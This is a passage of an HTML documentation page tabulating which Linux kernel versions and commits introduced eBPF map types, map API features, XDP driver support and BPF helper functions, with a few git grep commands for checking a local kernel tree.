<tr><td>struct ops</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/85d33df357b634649ddbe0a20fd2d0fc5732c3cb"><code>85d33df357b6</code></a></td><td>BPF_MAP_TYPE_STRUCT_OPS</td></tr>
|
||
<tr><td>ring buffer</td><td>5.8</td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td><td>BPF_MAP_TYPE_RINGBUF</td></tr>
|
||
<tr><td>inode storage</td><td>5.10</td><td><a href="https://github.com/torvalds/linux/commit/8ea636848aca35b9f97c5b5dee30225cf2dd0fe6"><code>8ea636848aca</code></a></td><td>BPF_MAP_TYPE_INODE_STORAGE</td></tr>
|
||
<tr><td>task storage</td><td>5.11</td><td><a href="https://github.com/torvalds/linux/commit/4cf1bc1f10452065a29d576fc5693fc4fab5b919"><code>4cf1bc1f1045</code></a></td><td>BPF_MAP_TYPE_TASK_STORAGE</td></tr>
|
||
<tr><td>Bloom filter</td><td>5.16</td><td><a href="https://github.com/torvalds/linux/commit/9330986c03006ab1d33d243b7cfe598a7a3c1baa"><code>9330986c0300</code></a></td><td>BPF_MAP_TYPE_BLOOM_FILTER</td></tr>
|
||
<tr><td>user ringbuf</td><td>6.1</td><td><a href="https://github.com/torvalds/linux/commit/583c1f420173f7d84413a1a1fbf5109d798b4faa"><code>583c1f420173</code></a></td><td>BPF_MAP_TYPE_USER_RINGBUF</td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h3 id="map-userspace-api"><a class="header" href="#map-userspace-api">Map userspace API</a></h3>
|
||
<p>Some (but not all) of these <em>API features</em> translate to a subcommand beginning with <code>BPF_MAP_</code>.
The list of subcommands supported in your kernel can be found in the file
<a href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/bpf.h"><code>include/uapi/linux/bpf.h</code></a>:</p>
|
||
<pre><code class="language-sh">git grep -W 'bpf_cmd {' include/uapi/linux/bpf.h
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Feature</th><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td>Basic operations (lookup, update, delete, <code>GET_NEXT_KEY</code>)</td><td>3.18</td><td><a href="https://github.com/torvalds/linux/commit/db20fd2b01087bdfbe30bce314a198eefedcc42e"><code>db20fd2b0108</code></a></td></tr>
|
||
<tr><td>Pass flags to <code>UPDATE_ELEM</code></td><td>3.19</td><td><a href="https://github.com/torvalds/linux/commit/3274f52073d88b62f3c5ace82ae9d48546232e72"><code>3274f52073d8</code></a></td></tr>
|
||
<tr><td>Pre-alloc map memory by default</td><td>4.6</td><td><a href="https://github.com/torvalds/linux/commit/6c90598174322b8888029e40dd84a4eb01f56afe"><code>6c9059817432</code></a></td></tr>
|
||
<tr><td>Pass <code>NULL</code> to <code>GET_NEXT_KEY</code></td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/8fe45924387be6b5c1be59a7eb330790c61d5d10"><code>8fe45924387b</code></a></td></tr>
|
||
<tr><td>Creation: select NUMA node</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/96eabe7a40aa17e613cf3db2c742ee8b1fc764d0"><code>96eabe7a40aa</code></a></td></tr>
|
||
<tr><td>Restrict access from syscall side</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/6e71b04a82248ccf13a94b85cbc674a9fefe53f5"><code>6e71b04a8224</code></a></td></tr>
|
||
<tr><td>Creation: specify map name</td><td>4.15</td><td><a href="https://github.com/torvalds/linux/commit/ad5b177bd73f5107d97c36f56395c4281fb6f089"><code>ad5b177bd73f</code></a></td></tr>
|
||
<tr><td><code>LOOKUP_AND_DELETE_ELEM</code></td><td>4.20</td><td><a href="https://github.com/torvalds/linux/commit/bd513cd08f10cbe28856f99ae951e86e86803861"><code>bd513cd08f10</code></a></td></tr>
|
||
<tr><td>Creation: <code>BPF_F_ZERO_SEED</code></td><td>5.0</td><td><a href="https://github.com/torvalds/linux/commit/96b3b6c9091d23289721350e32c63cc8749686be"><code>96b3b6c9091d</code></a></td></tr>
|
||
<tr><td><code>BPF_F_LOCK</code> flag for lookup / update</td><td>5.1</td><td><a href="https://github.com/torvalds/linux/commit/96049f3afd50fe8db69fa0068cdca822e747b1e4"><code>96049f3afd50</code></a></td></tr>
|
||
<tr><td>Restrict access from BPF side</td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/591fe9888d7809d9ee5c828020b6c6ae27c37229"><code>591fe9888d78</code></a></td></tr>
|
||
<tr><td><code>FREEZE</code></td><td>5.2</td><td><a href="https://github.com/torvalds/linux/commit/87df15de441bd4add7876ef584da8cabdd9a042a"><code>87df15de441b</code></a></td></tr>
|
||
<tr><td>mmap() support for array maps</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/fc9702273e2edb90400a34b3be76f7b08fa3344b"><code>fc9702273e2e</code></a></td></tr>
|
||
<tr><td><code>LOOKUP_BATCH</code></td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/cb4d03ab499d4c040f4ab6fd4389d2b49f42b5a5"><code>cb4d03ab499d</code></a></td></tr>
|
||
<tr><td><code>UPDATE_BATCH</code>, <code>DELETE_BATCH</code></td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/aa2e93b8e58e18442edfb2427446732415bc215e"><code>aa2e93b8e58e</code></a></td></tr>
|
||
<tr><td><code>LOOKUP_AND_DELETE_BATCH</code></td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/057996380a42bb64ccc04383cfa9c0ace4ea11f0"><code>057996380a42</code></a></td></tr>
|
||
<tr><td><code>LOOKUP_AND_DELETE_ELEM</code> support for hash maps</td><td>5.14</td><td><a href="https://github.com/torvalds/linux/commit/3e87f192b405960c0fe83e0925bd0dadf4f8cf43"><code>3e87f192b405</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="xdp"><a class="header" href="#xdp">XDP</a></h2>
|
||
<p>An approximate list of drivers or components supporting XDP programs for your
kernel can be retrieved with:</p>
|
||
<pre><code class="language-sh">git grep -l XDP_SETUP_PROG drivers/
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Feature / Driver</th><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td>XDP core architecture</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td></tr>
|
||
<tr><td>Action: drop</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td></tr>
|
||
<tr><td>Action: pass on to stack</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6a773a15a1e8874e5eccd2f29190c31085912c95"><code>6a773a15a1e8</code></a></td></tr>
|
||
<tr><td>Action: direct forwarding (on same port)</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/6ce96ca348a9e949f8c43f4d3e98db367d93cffd"><code>6ce96ca348a9</code></a></td></tr>
|
||
<tr><td>Direct packet data write</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/4acf6c0b84c91243c705303cd9ff16421914150d"><code>4acf6c0b84c9</code></a></td></tr>
|
||
<tr><td>Mellanox <code>mlx4</code> driver</td><td>4.8</td><td><a href="https://github.com/torvalds/linux/commit/47a38e155037f417c5740e24ccae6482aedf4b68"><code>47a38e155037</code></a></td></tr>
|
||
<tr><td>Mellanox <code>mlx5</code> driver</td><td>4.9</td><td><a href="https://github.com/torvalds/linux/commit/86994156c736978d113e7927455d4eeeb2128b9f"><code>86994156c736</code></a></td></tr>
|
||
<tr><td>Netronome <code>nfp</code> driver</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/ecd63a0217d5f1e8a92f7516f5586d1177b95de2"><code>ecd63a0217d5</code></a></td></tr>
|
||
<tr><td>QLogic (Cavium) <code>qed*</code> drivers</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/496e051709588f832d7a6a420f44f8642b308a87"><code>496e05170958</code></a></td></tr>
|
||
<tr><td><code>virtio_net</code> driver</td><td>4.10</td><td><a href="https://github.com/torvalds/linux/commit/f600b690501550b94e83e07295d9c8b9c4c39f4e"><code>f600b6905015</code></a></td></tr>
|
||
<tr><td>Broadcom <code>bnxt_en</code> driver</td><td>4.11</td><td><a href="https://github.com/torvalds/linux/commit/c6d30e8391b85e00eb544e6cf047ee0160ee9938"><code>c6d30e8391b8</code></a></td></tr>
|
||
<tr><td>Intel <code>ixgbe*</code> drivers</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/9247080816297de4e31abb684939c0e53e3a8a67"><code>924708081629</code></a></td></tr>
|
||
<tr><td>Cavium <code>thunderx</code> driver</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/05c773f52b96ef3fbc7d9bfa21caadc6247ef7a8"><code>05c773f52b96</code></a></td></tr>
|
||
<tr><td>Generic XDP</td><td>4.12</td><td><a href="https://github.com/torvalds/linux/commit/b5cdae3291f7be7a34e75affe4c0ec1f7f328b64"><code>b5cdae3291f7</code></a></td></tr>
|
||
<tr><td>Intel <code>i40e</code> driver</td><td>4.13</td><td><a href="https://github.com/torvalds/linux/commit/0c8493d90b6bb0f5c4fe9217db8f7203f24c0f28"><code>0c8493d90b6b</code></a></td></tr>
|
||
<tr><td>Action: redirect</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/6453073987ba392510ab6c8b657844a9312c67f7"><code>6453073987ba</code></a></td></tr>
|
||
<tr><td>Support for tap</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/761876c857cb2ef8489fbee01907151da902af91"><code>761876c857cb</code></a></td></tr>
|
||
<tr><td>Support for veth</td><td>4.14</td><td><a href="https://github.com/torvalds/linux/commit/d445516966dcb2924741b13b27738b54df2af01a"><code>d445516966dc</code></a></td></tr>
|
||
<tr><td>Intel <code>ixgbevf</code> driver</td><td>4.17</td><td><a href="https://github.com/torvalds/linux/commit/c7aec59657b60f3a29fc7d3274ebefd698879301"><code>c7aec59657b6</code></a></td></tr>
|
||
<tr><td>Freescale <code>dpaa2</code> driver</td><td>5.0</td><td><a href="https://github.com/torvalds/linux/commit/7e273a8ebdd3b83f94eb8b49fc8ee61464f47cc2"><code>7e273a8ebdd3</code></a></td></tr>
|
||
<tr><td>Socionext <code>netsec</code> driver</td><td>5.3</td><td><a href="https://github.com/torvalds/linux/commit/ba2b232108d3c2951bab02930a00f23b0cffd5af"><code>ba2b232108d3</code></a></td></tr>
|
||
<tr><td>TI <code>cpsw</code> driver</td><td>5.3</td><td><a href="https://github.com/torvalds/linux/commit/9ed4050c0d75768066a07cf66eef4f8dc9d79b52"><code>9ed4050c0d75</code></a></td></tr>
|
||
<tr><td>Intel <code>ice</code> driver</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/efc2214b6047b6f5b4ca53151eba62521b9452d6"><code>efc2214b6047</code></a></td></tr>
|
||
<tr><td>Solarflare <code>sfc</code> driver</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/eb9a36be7f3ec414700af9a616f035eda1f1e63e"><code>eb9a36be7f3e</code></a></td></tr>
|
||
<tr><td>Marvell <code>mvneta</code> driver</td><td>5.5</td><td><a href="https://github.com/torvalds/linux/commit/0db51da7a8e99f0803ec3a8e25c1a66234a219cb"><code>0db51da7a8e9</code></a></td></tr>
|
||
<tr><td>Microsoft <code>hv_netvsc</code> driver</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/351e1581395fcc7fb952bbd7dda01238f69968fd"><code>351e1581395f</code></a></td></tr>
|
||
<tr><td>Amazon <code>ena</code> driver</td><td>5.6</td><td><a href="https://github.com/torvalds/linux/commit/838c93dc5449e5d6378bae117b0a65a122cf7361"><code>838c93dc5449</code></a></td></tr>
|
||
<tr><td><code>xen-netfront</code> driver</td><td>5.9</td><td><a href="https://github.com/torvalds/linux/commit/6c5aa6fc4defc2a0977a2c59e4710d50fa1e834c"><code>6c5aa6fc4def</code></a></td></tr>
|
||
<tr><td>Intel <code>igb</code> driver</td><td>5.10</td><td><a href="https://github.com/torvalds/linux/commit/9cbc948b5a20c9c054d9631099c0426c16da546b"><code>9cbc948b5a20</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="helpers"><a class="header" href="#helpers">Helpers</a></h2>
|
||
<p>The list of helpers supported in your kernel can be found in the file
<a href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/bpf.h"><code>include/uapi/linux/bpf.h</code></a>:</p>
|
||
<pre><code class="language-sh">git grep ' FN(' include/uapi/linux/bpf.h
</code></pre>
|
||
<p>The helpers below are listed in roughly alphabetical order.</p>
|
||
<div class="table-wrapper"><table><thead><tr><th>Helper</th><th>Kernel version</th><th>License</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td><code>BPF_FUNC_bind()</code></td><td>4.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d74bad4e74ee373787a9ae24197c17b7cdc428d5"><code>d74bad4e74ee</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_bprm_opts_set()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3f6719c7b62f0327c9091e26d0da10e65668229e"><code>3f6719c7b62f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_btf_find_by_name_kind()</code></td><td>5.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3d78417b60fba249cc555468cb72d96f5cde2964"><code>3d78417b60fb</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_cgrp_storage_delete()</code></td><td>6.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c4bcfb38a95edb1021a53f2d0356a78120ecfbe4"><code>c4bcfb38a95e</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_cgrp_storage_get()</code></td><td>6.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c4bcfb38a95edb1021a53f2d0356a78120ecfbe4"><code>c4bcfb38a95e</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_check_mtu()</code></td><td>5.12</td><td></td><td><a href="https://github.com/torvalds/linux/commit/34b2021cc61642d61c3cf943d9e71925b827941b"><code>34b2021cc616</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_clone_redirect()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3896d655f4d491c67d669a15f275a39f713410f8"><code>3896d655f4d4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_copy_from_user()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/07be4c4a3e7a0db148e44b16c5190e753d1c8569"><code>07be4c4a3e7a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_copy_from_user_task()</code></td><td>5.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/376040e47334c6dc6a939a32197acceb00fe4acf"><code>376040e47334</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_csum_diff()</code></td><td>4.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7d672345ed295b1356a5d9f7111da1d1d7d65867"><code>7d672345ed29</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_csum_level()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7cdec54f9713256bb170873a1fc5c75c9127c9d2"><code>7cdec54f9713</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_csum_update()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/36bbef52c7eb646ed6247055a2acd3851e317857"><code>36bbef52c7eb</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_current_task_under_cgroup()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/60d20f9195b260bdf0ac10c275ae9f6016f9c069"><code>60d20f9195b2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_d_path()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6e22ab9da79343532cd3cde39df25e5a5478c692"><code>6e22ab9da793</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_dynptr_data()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/34d4ef5775f776ec4b0d53a02d588bf3195cada6"><code>34d4ef5775f7</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_dynptr_from_mem()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/263ae152e96253f40c2c276faad8629e096b3bad"><code>263ae152e962</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_dynptr_read()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/13bbbfbea7598ea9f8d9c3d73bf053bb57f9c4b2"><code>13bbbfbea759</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_dynptr_write()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/13bbbfbea7598ea9f8d9c3d73bf053bb57f9c4b2"><code>13bbbfbea759</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_fib_lookup()</code></td><td>4.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/87f5fc7e48dd3175b30dd03b41564e1a8e136323"><code>87f5fc7e48dd</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_find_vma()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7c7e3d31e7856a8260a254f8c71db416f7f9f5a1"><code>7c7e3d31e785</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_for_each_map_elem()</code></td><td>5.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/69c087ba6225b574afb6e505b72cb75242a3d844"><code>69c087ba6225</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_attach_cookie()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7adfc6c9b315e174cf8743b21b7b691c8766791b"><code>7adfc6c9b315</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_branch_snapshot()</code></td><td>5.16</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/856c02dbce4f8d6a5644083db22c11750aa11481"><code>856c02dbce4f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_ancestor_cgroup_id()</code></td><td>5.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b4490c5c4e023f09b7d27c9a9d3e7ad7d09ea6bf"><code>b4490c5c4e02</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_cgroup_classid()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8d20aabe1c76cccac544d9fcc3ad7823d9e98a2d"><code>8d20aabe1c76</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_cgroup_id()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/bf6fa2c893c5237b48569a13fa3c673041430b6c"><code>bf6fa2c893c5</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_comm()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/ffeedafbf0236f03aeb2e8db273b3e5ae5f5bc89"><code>ffeedafbf023</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_pid_tgid()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/ffeedafbf0236f03aeb2e8db273b3e5ae5f5bc89"><code>ffeedafbf023</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_task()</code></td><td>4.8</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/606274c5abd8e245add01bc7145a8cbb92b69ba8"><code>606274c5abd8</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_task_btf()</code></td><td>5.11</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/3ca1032ab7ab010eccb107aa515598788f7d93bb"><code>3ca1032ab7ab</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_current_uid_gid()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/ffeedafbf0236f03aeb2e8db273b3e5ae5f5bc89"><code>ffeedafbf023</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_func_arg()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f92c1e183604c20ce00eb889315fdaa8f2d9e509"><code>f92c1e183604</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_func_arg_cnt()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f92c1e183604c20ce00eb889315fdaa8f2d9e509"><code>f92c1e183604</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_func_ip()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/5d8b583d04aedb3bd5f6d227a334c210c7d735f9"><code>5d8b583d04ae</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_func_ret()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f92c1e183604c20ce00eb889315fdaa8f2d9e509"><code>f92c1e183604</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_retval()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b44123b4a3dcad4664d3a0f72c011ffd4c9c4d93"><code>b44123b4a3dc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_hash_recalc()</code></td><td>4.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/13c5c240f789bbd2bcacb14a23771491485ae61f"><code>13c5c240f789</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_listener_sock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/dbafd7ddd62369b2f3926ab847cbf8fc40e800b7"><code>dbafd7ddd623</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_local_storage()</code></td><td>4.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/cd3394317653837e2eb5c5d0904a8996102af9fc"><code>cd3394317653</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_netns_cookie()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f318903c0bf42448b4c884732df2bbb0ef7a2284"><code>f318903c0bf4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_ns_current_pid_tgid()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b4490c5c4e023f09b7d27c9a9d3e7ad7d09ea6bf"><code>b4490c5c4e02</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_numa_node_id()</code></td><td>4.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/2d0e30c30f84d08dc16f0f2af41f1b8a85f0755e"><code>2d0e30c30f84</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_prandom_u32()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/03e69b508b6f7c51743055c9f61d1dfeadf4b635"><code>03e69b508b6f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_route_realm()</code></td><td>4.4</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c46646d0484f5d08e2bede9b45034ba5b8b489cc"><code>c46646d0484f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_smp_processor_id()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c04167ce2ca0ecaeaafef006cb0d65cf01b68e42"><code>c04167ce2ca0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_socket_cookie()</code></td><td>4.12</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91b8270f2a4d1d9b268de90451cdca63a70052d6"><code>91b8270f2a4d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_socket_uid()</code></td><td>4.12</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6acc5c2910689fc6ee181bf63085c5efff6a42bd"><code>6acc5c291068</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_stack()</code></td><td>4.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/de2ff05f48afcde816ff4edb217417f62f624ab5"><code>de2ff05f48af</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_stackid()</code></td><td>4.6</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/d5a3b1f691865be576c2bffa708549b8cdccda19"><code>d5a3b1f69186</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_get_task_stack()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fa28dcb82a38f8e3993b0fae9106b1a80b59e4f0"><code>fa28dcb82a38</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_getsockopt()</code></td><td>4.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/cd86d1fd21025fdd6daf23d1288da405e7ad0ec6"><code>cd86d1fd2102</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ima_file_hash()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/174b16946e39ebd369097e0f773536c91a8c1a4c"><code>174b16946e39</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ima_inode_hash()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/27672f0d280a3f286a410a8db2004f46ace72a17"><code>27672f0d280a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_inode_storage_delete()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8ea636848aca35b9f97c5b5dee30225cf2dd0fe6"><code>8ea636848aca</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_inode_storage_get()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8ea636848aca35b9f97c5b5dee30225cf2dd0fe6"><code>8ea636848aca</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_jiffies64()</code></td><td>5.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/5576b991e9c1a11d2cc21c4b94fc75ec27603896"><code>5576b991e9c1</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_kallsyms_lookup_name()</code></td><td>5.16</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d6aef08a872b9e23eecc92d0e92393473b13c497"><code>d6aef08a872b</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_kptr_xchg()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c0a5a21c25f37c9fd7b36072f9968cdff1e4aa13"><code>c0a5a21c25f3</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ktime_get_boot_ns()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/71d19214776e61b33da48f7c1b46e522c7f78221"><code>71d19214776e</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ktime_get_coarse_ns()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d055126180564a57fe533728a4e93d0cb53d49b3"><code>d05512618056</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ktime_get_ns()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d9847d310ab4003725e6ed1822682e24bd406908"><code>d9847d310ab4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ktime_get_tai_ns()</code></td><td>6.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c8996c98f703b09afe77a1d247dae691c9849dc1"><code>c8996c98f703</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_l3_csum_replace()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91bc4822c3d61b9bb7ef66d3b77948a4f9177954"><code>91bc4822c3d6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_l4_csum_replace()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91bc4822c3d61b9bb7ef66d3b77948a4f9177954"><code>91bc4822c3d6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_load_hdr_opt()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0813a841566f0962a5551be7749b43c45f0022a0"><code>0813a841566f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_loop()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/e6f2dd0f80674e9d5960337b3e9c2a242441b326"><code>e6f2dd0f8067</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_lwt_push_encap()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee79"><code>fe94cc290f53</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_lwt_seg6_action()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee79"><code>fe94cc290f53</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_lwt_seg6_adjust_srh()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee79"><code>fe94cc290f53</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_lwt_seg6_store_bytes()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/fe94cc290f535709d3c5ebd1e472dfd0aec7ee79"><code>fe94cc290f53</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_map_delete_elem()</code></td><td>3.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d0003ec01c667b731c139e23de3306a8b328ccf5"><code>d0003ec01c66</code></a></td></tr>
|
||
